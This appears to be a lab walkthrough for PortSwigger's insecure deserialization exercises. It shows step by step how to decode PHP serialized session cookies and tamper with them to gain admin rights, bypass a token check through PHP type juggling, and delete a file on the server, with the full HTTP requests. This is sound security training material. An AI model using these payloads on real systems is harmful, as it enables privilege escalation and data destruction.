Walk-through of the Insecure deserialization lab on PortSwigger Web Security Academy. See Exploiting insecure deserialization vulnerabilities.
Use the Hackvertor extension to encode the payload.
- Apprentice – Modifying serialized objects
- Practitioner – Modifying serialized data types
- Practitioner – Using application functionality to exploit insecure deserialization
- Practitioner – Arbitrary object injection in PHP
- Practitioner – Exploiting Java deserialization with Apache Commons
- Practitioner – Exploiting PHP deserialization with a pre-built gadget chain
- Practitioner – Exploiting Ruby deserialization using a documented gadget chain
- Expert – Developing a custom gadget chain for Java deserialization
- Expert – Developing a custom gadget chain for PHP deserialization
- Expert – Using PHAR deserialization to deploy a custom gadget chain
Apprentice – Modifying serialized objects
To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete Carlos’s account.
Click on My account and log in with credentials wiener/peter. A session cookie is created.
Set-Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d;
Decode it (URL then base 64). By looking at the format, we can guess it is a PHP serialized object.
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
Change the value of admin from false to true (0 to 1), then encode it in base 64.
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30=
Change the session cookie value in your browser and refresh the page. You will have access to the Admin panel to delete user carlos.
Practitioner – Modifying serialized data types
To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.
Hint: To access another user’s account, you will need to exploit a quirk in how PHP compares data of different types.
Click on My account and log in with credentials wiener/peter. A session cookie is created.
Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJmdGhnem13NnprcWE2cnY5Y3JzYTJ2M2Z2NGVkcTNsciI7fQ%3d%3d
Decode it (URL then base 64). By looking at the format, we can guess it is a PHP serialized object.
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"fthgzmw6zkqa6rv9crsa2v3fv4edq3lr";}
Change the value of user wiener to administrator, adjust length from 6 to 13, then encode it in base 64.
GET /my-account HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";s:32:"fthgzmw6zkqa6rv9crsa2v3fv4edq3lr";}<@/base64url>
...
We get an error regarding the token:
PHP Fatal error: Uncaught Exception: (DEBUG: $access_tokens[$user->username] = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, $user->access_token = fthgzmw6zkqa6rv9crsa2v3fv4edq3lr, $access_tokens = [xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx,xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx,xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]) Invalid access token for user administrator in /var/www/index.php:8
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 8
Change the access token to an integer of 0.
GET /my-account HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}<@/base64url>
...
You can now access the Admin panel.
GET /admin HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}<@/base64url>
Delete user carlos to solve the lab.
GET /admin/delete?username=carlos HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64url>O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}<@/base64url>
...
Practitioner – Using application functionality to exploit insecure deserialization
To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.
Click on My account and log in with credentials wiener/peter. A session cookie is created.
Set-Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ1OWU4Y3Rlc3MyY3czdjRjcDdyNjdvcGt2c2ZyNWxxZCI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d;
Decode it (URL then base 64). By looking at the format, we can guess it is a PHP serialized object.
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"u9e8ctess2cw3v4cp7r67opkvsfr5lqd";s:11:"avatar_link";s:19:"users/wiener/avatar";}
Change the value of avatar_link to /home/carlos/morale.txt, adjust length from 19 to 23, then encode it in base 64.
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"u9e8ctess2cw3v4cp7r67opkvsfr5lqd";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
Intercept requests. On the My account page, click to delete the user. Change the session cookie value and forward the request.
POST /my-account/delete HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<@base64>O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"u9e8ctess2cw3v4cp7r67opkvsfr5lqd";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}<@/base64>
...